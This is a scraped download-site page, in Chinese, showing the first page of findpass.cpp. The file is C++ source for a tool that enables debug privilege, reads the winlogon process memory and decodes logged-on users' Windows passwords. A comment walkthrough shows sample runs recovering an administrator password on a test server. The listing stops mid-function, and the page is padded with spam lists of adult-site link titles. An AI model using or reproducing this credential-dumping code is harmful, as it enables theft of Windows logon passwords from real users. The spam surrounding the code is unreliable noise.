亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? findpass.cpp

?? 這是一本學(xué)習(xí) window編程的很好的參考教材
?? CPP
?? 第 1 頁 / 共 2 頁
字號:
// Find Password from winlogon in win2000 / winnt4 + < sp6
//
// PasswordReminder.cpp --> FindPass.cpp
// 1. http://www.smidgeonsoft.com/
// 2. shotgun add comment, bingle change a little to find other user in winlogon
// This code is licensed under the terms of the GPL (gnu public license). 
//
// Usage: FindPass  DomainName UserName PID-of-WinLogon
//
// you can get the three params from pulist output in target system.
//

/*
因?yàn)榈顷懙挠蛎陀脩裘敲魑拇鎯υ趙inlogon進(jìn)程里的,而PasswordReminder是限定了查找本進(jìn)程用戶的密碼
<167-174:    GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
    GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); 
>,然后到winlogon進(jìn)程的空間中查找UserDomain和UserName < 590:// 在WinLogon的內(nèi)存空間中尋找UserName和DomainName的字符串 
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) 
&& 
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) 
> ,找到后就查后邊的加密口令。 

其實(shí)只要你自己指定用戶名和winlogon進(jìn)程去查找就行了,只要你是管理員,任何本機(jī)用msgina.dll圖形登陸的用戶口令都可以找到。 

1. pulist,找到系統(tǒng)里登陸的域名和用戶名,及winlogon進(jìn)程id 
2. 然后給每個(gè)winlogon進(jìn)程id查找指定的用戶就行了。

example: 

C:\Documents and Settings\bingle>pulist 
Process           PID  User 
Idle              0 
System            8 
smss.exe          164  NT AUTHORITY\SYSTEM 
csrss.exe         192  NT AUTHORITY\SYSTEM 
winlogon.exe      188  NT AUTHORITY\SYSTEM 
wins.exe          1212 NT AUTHORITY\SYSTEM 
Explorer.exe      388  TEST-2KSERVER\Administrator 
internat.exe      1828 TEST-2KSERVER\Administrator 
conime.exe        1868 TEST-2KSERVER\Administrator 
msiexec.exe       1904 NT AUTHORITY\SYSTEM 
tlntsvr.exe       1048 NT AUTHORITY\SYSTEM 
taskmgr.exe       1752 TEST-2KSERVER\Administrator 
csrss.exe         2056 NT AUTHORITY\SYSTEM 
winlogon.exe      2416 NT AUTHORITY\SYSTEM 
rdpclip.exe       2448 TEST-2KSERVER\clovea 
Explorer.exe      2408 TEST-2KSERVER\clovea 
internat.exe      1480 TEST-2KSERVER\clovea 
cmd.exe           2508 TEST-2KSERVER\Administrator 
ntshell.exe       368  TEST-2KSERVER\Administrator 
ntshell.exe       1548 TEST-2KSERVER\Administrator 
ntshell.exe       1504 TEST-2KSERVER\Administrator 
csrss.exe         1088 NT AUTHORITY\SYSTEM 
winlogon.exe      1876 NT AUTHORITY\SYSTEM 
rdpclip.exe       1680 TEST-2KSERVER\bingle 
Explorer.exe      2244 TEST-2KSERVER\bingle 
conime.exe        2288 TEST-2KSERVER\bingle 
internat.exe      1592 TEST-2KSERVER\bingle 
cmd.exe           1692 TEST-2KSERVER\bingle 
mdm.exe           2476 TEST-2KSERVER\bingle 
taskmgr.exe       752  TEST-2KSERVER\bingle 
pulist.exe        2532 TEST-2KSERVER\bingle 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
administrator 188 

         To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 188 (0x000000bc). 
To find TEST-2KSERVER\administrator password in process 188 ... 
The encoded password is found at 0x008e0800 and has a length of 10. 
The logon information is: TEST-2KSERVER/administrator/testserver. 
The hash byte is: 0x13. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 1876 

         To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\clovea password in process 1876 ... 
PasswordReminder is unable to find the password in memory. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
bingle 1876 

         To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\bingle password in process 1876 ... 
The logon information is: TEST-2KSERVER/bingle. 
There is no password. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 2416 

         To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 2416 (0x00000970). 
To find TEST-2KSERVER\clovea password in process 2416 ... 
The logon information is: TEST-2KSERVER/clovea. 
There is no password. 

C:\Documents and Settings\bingle> 

*/


#include <windows.h> 
#include <tchar.h> 
#include <stdio.h> 
#include <stdlib.h> 

typedef struct _UNICODE_STRING 
{ 
    USHORT Length; 
    USHORT MaximumLength; 
    PWSTR Buffer; 
} UNICODE_STRING, *PUNICODE_STRING; 

// Undocumented typedef's 
typedef struct _QUERY_SYSTEM_INFORMATION 
{ 
    DWORD GrantedAccess; 
    DWORD PID; 
    WORD HandleType; 
    WORD HandleId; 
    DWORD Handle; 
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; 
typedef struct _PROCESS_INFO_HEADER 
{ 
    DWORD Count; 
    DWORD Unk04; 
    DWORD Unk08; 
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; 
typedef struct _PROCESS_INFO 
{ 
    DWORD LoadAddress; 
    DWORD Size; 
    DWORD Unk08; 
    DWORD Enumerator; 
    DWORD Unk10; 
    char Name [0x108]; 
} PROCESS_INFO, *PPROCESS_INFO; 
typedef struct _ENCODED_PASSWORD_INFO 
{ 
    DWORD HashByte; 
    DWORD Unk04; 
    DWORD Unk08; 
    DWORD Unk0C; 
    FILETIME LoggedOn; 
    DWORD Unk18; 
    DWORD Unk1C; 
    DWORD Unk20; 
    DWORD Unk24; 
    DWORD Unk28; 
    UNICODE_STRING EncodedPassword; 
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; 

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD); 
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); 
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); 
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); 
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING); 

// Private Prototypes 
BOOL IsWinNT (void); 
BOOL IsWin2K (void); 
BOOL AddDebugPrivilege (void); 
DWORD FindWinLogon (void); 
BOOL LocatePasswordPageWinNT (DWORD, PDWORD); 
BOOL LocatePasswordPageWin2K (DWORD, PDWORD); 
void DisplayPasswordWinNT (void); 
void DisplayPasswordWin2K (void); 

// Global Variables 
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; 
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; 
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; 
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; 
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; 

DWORD PasswordLength = 0; 
PVOID RealPasswordP = NULL; 
PVOID PasswordP = NULL; 
DWORD HashByte = 0;
wchar_t UserName [0x400]; 
wchar_t UserDomain [0x400]; 

int __cdecl main( int argc, char* argv[] ) 
{ 
    printf( "\n\t To Find Password in the Winlogon process\n" );
	printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); 

    if ((!IsWinNT ()) 
            && 
        (!IsWin2K ())) 
    { 
        printf ("Windows NT or Windows 2000 are required.\n"); 
        return (0); 
    } 

    // Add debug privilege to PasswordReminder - 
    // this is needed for the search for Winlogon. 
    // 增加PasswordReminder的權(quán)限 
    // 使得PasswordReminder可以打開并調(diào)試Winlogon進(jìn)程 
    if (!AddDebugPrivilege ()) 
    { 
        printf 
            ("Unable to add debug privilege.\n"); 
        return (0); 
    } 
    printf ("The debug privilege has been added to PasswordReminder.\n"); 

    // 獲得幾個(gè)未公開API的入口地址 
    HINSTANCE hNtDll = 
        LoadLibrary 
            ("NTDLL.DLL"); 
    pfnNtQuerySystemInformation = 
        (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress 
            (hNtDll, 
            "NtQuerySystemInformation"); 
    pfnRtlCreateQueryDebugBuffer = 
        (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress 
            (hNtDll, 
            "RtlCreateQueryDebugBuffer"); 
    pfnRtlQueryProcessDebugInformation = 
        (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress 
            (hNtDll, 
            "RtlQueryProcessDebugInformation"); 
    pfnRtlDestroyQueryDebugBuffer = 
        (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress 
            (hNtDll, 
            "RtlDestroyQueryDebugBuffer"); 
    pfnRtlRunDecodeUnicodeString = 
        (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress 
            (hNtDll, 
            "RtlRunDecodeUnicodeString"); 

    // Locate WinLogon's PID - need debug privilege and admin rights. 
    // 獲得Winlogon進(jìn)程的PID 
    // 這里作者使用了幾個(gè)Native API,其實(shí)使用PSAPI一樣可以 
    DWORD WinLogonPID = 
        argc > 3 ? atoi( argv[3] ) : FindWinLogon () ; 
    if (WinLogonPID == 0) 
    { 
        printf 
            ("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n"); 
        printf 
            ("PasswordReminder is unable to find the password in memory.\n"); 
        FreeLibrary (hNtDll); 
        return (0); 
    } 

	printf("The WinLogon process id is %d (0x%8.8lx).\n", 
			WinLogonPID, WinLogonPID); 

    // Set values to check memory block against. 
    // 初始化幾個(gè)和用戶賬號相關(guān)的變量 
	memset(UserName, 0, sizeof (UserName)); 
	memset(UserDomain, 0, sizeof (UserDomain)); 
	if( argc > 2 )
	{	
		mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) );
		mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) );
	}else
	{
		GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
		GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); 
	}
	printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID );

    // Locate the block of memory containing 
    // the password in WinLogon's memory space. 
    // 在Winlogon進(jìn)程中定位包含Password的內(nèi)存塊 
    BOOL FoundPasswordPage = FALSE; 
    if (IsWin2K ()) 
        FoundPasswordPage = 
            LocatePasswordPageWin2K 
                (WinLogonPID, 
                &PasswordLength); 
    else 
        FoundPasswordPage = 
            LocatePasswordPageWinNT 
                (WinLogonPID, 
                &PasswordLength); 

    if (FoundPasswordPage) 
    { 
        if (PasswordLength == 0) 
        { 
            printf 
                ("The logon information is: %S/%S.\n", 
                UserDomain, 
                UserName); 
            printf 
                ("There is no password.\n"); 
        } 
        else 
        { 
            printf 
                ("The encoded password is found at 0x%8.8lx and has a length of %d.\n", 
                RealPasswordP, 
                PasswordLength); 
            // Decode the password string. 
            if (IsWin2K ()) 
                DisplayPasswordWin2K (); 
            else 
                DisplayPasswordWinNT (); 
        } 
    } 
    else 
        printf 
            ("PasswordReminder is unable to find the password in memory.\n"); 

    FreeLibrary 
        (hNtDll); 
    return (0); 
} // main 

// 
// IsWinNT函數(shù)用來判斷操作系統(tǒng)是否WINNT 
// 
BOOL 
    IsWinNT 
        (void) 
{ 
    OSVERSIONINFO OSVersionInfo; 
    OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
    if (GetVersionEx 
            (&OSVersionInfo)) 
        return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); 
    else 
        return (FALSE); 
} // IsWinNT 


// 
// IsWin2K函數(shù)用來判斷操作系統(tǒng)是否Win2K 
// 
BOOL 
    IsWin2K 
        (void) 
{ 
    OSVERSIONINFO OSVersionInfo; 
    OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
    if (GetVersionEx 
            (&OSVersionInfo)) 
        return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) 
                    && 
                (OSVersionInfo.dwMajorVersion == 5)); 
    else 
        return (FALSE); 
} // IsWin2K 


// 
// AddDebugPrivilege函數(shù)用來申請調(diào)試Winlogon進(jìn)程的特權(quán) 
// 
BOOL 
    AddDebugPrivilege 
        (void) 
{ 
    HANDLE Token; 
    TOKEN_PRIVILEGES TokenPrivileges, PreviousState; 
    DWORD ReturnLength = 0; 
    if (OpenProcessToken 
            (GetCurrentProcess (), 
            TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, 
            &Token)) 
        if (LookupPrivilegeValue 
                (NULL, 
                "SeDebugPrivilege", 
                &TokenPrivileges.Privileges[0].Luid)) 
        { 
            TokenPrivileges.PrivilegeCount = 1; 
            TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
            return 
                (AdjustTokenPrivileges 
                    (Token, 
                    FALSE, 
                    &TokenPrivileges, 
                    sizeof (TOKEN_PRIVILEGES), 
                    &PreviousState, 
                    &ReturnLength)); 
        } 
    return (FALSE); 
} // AddDebugPrivilege 


// 
// Note that the following code eliminates the need 
// for PSAPI.DLL as part of the executable. 
// FindWinLogon函數(shù)用來尋找WinLogon進(jìn)程 
// 由于作者使用的是Native API,因此不需要PSAPI的支持 
// 
DWORD 
    FindWinLogon 
        (void) 
{ 
#define INITIAL_ALLOCATION 0x100 
    DWORD rc = 0; 
    DWORD SizeNeeded = 0; 
    PVOID InfoP = 
        HeapAlloc 
            (GetProcessHeap (), 
            HEAP_ZERO_MEMORY, 
            INITIAL_ALLOCATION); 
    // Find how much memory is required. 
    pfnNtQuerySystemInformation 
        (0x10, 
        InfoP, 
        INITIAL_ALLOCATION, 
        &SizeNeeded); 
    HeapFree 
        (GetProcessHeap (), 
        0, 
        InfoP); 
    // Now, allocate the proper amount of memory. 
    InfoP = 
        HeapAlloc 
            (GetProcessHeap (), 
            HEAP_ZERO_MEMORY, 
            SizeNeeded); 
    DWORD SizeWritten = SizeNeeded; 

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产婷婷一区二区| 国产风韵犹存在线视精品| 久久嫩草精品久久久久| 在线免费观看日韩欧美| 国产自产2019最新不卡| 亚洲精品国产高清久久伦理二区| 欧美精品一区二区久久婷婷 | 亚洲一区二区四区蜜桃| 久久综合九色综合欧美就去吻| 91久久奴性调教| 国产.欧美.日韩| 毛片av一区二区| 午夜伦理一区二区| 亚洲欧美日韩国产综合在线| 久久精品亚洲精品国产欧美kt∨ | 日日摸夜夜添夜夜添亚洲女人| 日韩理论在线观看| 国产欧美一区二区精品秋霞影院| 91精品国产欧美日韩| 欧美性生活一区| 91色乱码一区二区三区| 国产suv一区二区三区88区| 蜜臀av国产精品久久久久| 亚洲成人一区二区在线观看| 一区二区在线观看免费视频播放| 欧美国产日韩a欧美在线观看| 欧美xxxx老人做受| 日韩精品一区二区在线| 在线播放亚洲一区| 欧美日韩国产在线观看| 欧美揉bbbbb揉bbbbb| 欧美无砖砖区免费| 欧美性欧美巨大黑白大战| 91高清视频免费看| 欧美羞羞免费网站| 欧美日韩1区2区| 制服视频三区第一页精品| 欧美日本在线观看| 91精品国产综合久久福利| 欧美精品久久天天躁| 欧美三级在线看| 欧美精品久久久久久久久老牛影院| 欧美日韩三级视频| 欧美一级搡bbbb搡bbbb| 欧美一区二区福利视频| 精品奇米国产一区二区三区| 精品国产乱码久久久久久浪潮| 精品91自产拍在线观看一区| 国产亚洲欧美日韩日本| 国产精品久久久久久久久果冻传媒| 一色屋精品亚洲香蕉网站| 曰韩精品一区二区| 午夜成人在线视频| 久久成人av少妇免费| 国产老肥熟一区二区三区| 成人小视频在线观看| 99久久精品免费看国产| 欧美三区在线观看| 精品成人在线观看| 中文字幕中文字幕中文字幕亚洲无线| 亚洲精品写真福利| 青青草伊人久久| 成人影视亚洲图片在线| 欧美最新大片在线看| 91麻豆精品国产91久久久 | 国产精品一区二区无线| a级高清视频欧美日韩| 欧美色精品在线视频| 欧美白人最猛性xxxxx69交| 国产精品婷婷午夜在线观看| 一区二区三区在线观看网站| 天堂一区二区在线免费观看| 国产在线不卡一区| 一本久久a久久精品亚洲| 717成人午夜免费福利电影| 精品福利在线导航| 亚洲美腿欧美偷拍| 美美哒免费高清在线观看视频一区二区 | 91精品国产手机| 国产午夜精品美女毛片视频| 亚洲欧美偷拍三级| 久久99国产乱子伦精品免费| www.欧美色图| 日韩亚洲欧美一区| 亚洲视频在线一区观看| 麻豆成人免费电影| 一本久久精品一区二区| 久久久亚洲欧洲日产国码αv| 亚洲日本韩国一区| 韩国精品主播一区二区在线观看 | 国产在线精品一区二区三区不卡| 国产成人日日夜夜| 久久精品视频网| 久久精品国产99国产精品| 日韩免费性生活视频播放| 日日骚欧美日韩| 久久成人综合网| 2024国产精品| 国产精品久久久久影院亚瑟| 麻豆91小视频| 国产在线日韩欧美| av在线不卡电影| 日韩网站在线看片你懂的| 亚洲天堂成人网| 国产精品小仙女| 在线不卡免费av| 亚洲一区二区三区四区五区黄| 国产成人综合亚洲91猫咪| 正在播放一区二区| 亚洲一区在线观看免费| 成人国产电影网| 久久久噜噜噜久噜久久综合| 亚洲成av人片在线观看无码| 91玉足脚交白嫩脚丫在线播放| 国产亚洲综合在线| 久久爱另类一区二区小说| 欧美私人免费视频| 一区二区三区四区av| 91丨九色丨蝌蚪富婆spa| 亚洲一区二区中文在线| 91精品国产乱| 精品粉嫩aⅴ一区二区三区四区 | 制服丝袜激情欧洲亚洲| 一级特黄大欧美久久久| 成人午夜在线播放| 国产欧美一区二区三区在线看蜜臀 | 久久久精品一品道一区| 久久精品国产77777蜜臀| 欧美一区二区三区白人| 青青国产91久久久久久| 日韩一区二区在线看片| 美女视频黄 久久| 日韩一区二区免费视频| 日本亚洲最大的色成网站www| 精品视频免费看| 婷婷国产在线综合| 色屁屁一区二区| 欧美色视频在线观看| 成人激情免费网站| 国产精品白丝jk白祙喷水网站| 中文字幕亚洲在| 欧美韩日一区二区三区| 26uuu色噜噜精品一区| 九色综合国产一区二区三区| 91精品国产aⅴ一区二区| 日韩成人伦理电影在线观看| 欧美巨大另类极品videosbest| 亚洲成年人影院| 欧美一区二区高清| 国产一区二区中文字幕| 国产视频一区不卡| 本田岬高潮一区二区三区| 亚洲欧洲成人精品av97| 91丨porny丨蝌蚪视频| 国产精品国产三级国产专播品爱网 | 国产精品久久久爽爽爽麻豆色哟哟 | 国产一区二区三区免费| 欧美激情一区二区三区四区 | 国产在线不卡视频| 国产精品久久久久毛片软件| 91电影在线观看| 男女性色大片免费观看一区二区| www亚洲一区| 亚洲视频在线一区| 午夜不卡av免费| 激情综合五月天| 色综合天天狠狠| 99精品欧美一区二区蜜桃免费| 国产一区二区不卡| 欧美中文字幕一二三区视频| 北岛玲一区二区三区四区| 成人毛片老司机大片| 国产一区欧美一区| 韩国av一区二区三区在线观看 | 一本一道综合狠狠老| 色综合视频在线观看| 91精品国产综合久久精品麻豆| 精品处破学生在线二十三| 一区二区三区在线看| 成人国产精品免费| 久久综合国产精品| 免费观看在线色综合| 欧美在线综合视频| 亚洲欧美综合色| 高清shemale亚洲人妖| 91精品国产一区二区| 樱花影视一区二区| www.久久精品| 中文字幕高清一区| 国产一区欧美日韩| 精品久久一区二区| 久久国产麻豆精品| 久久看人人爽人人| 亚洲国产成人高清精品| 日本韩国一区二区三区| 国产精品久久久久久久久久免费看| 国产一区二区0| 亚洲欧美一区二区视频| 色综合久久久久网| 亚洲成人av一区二区|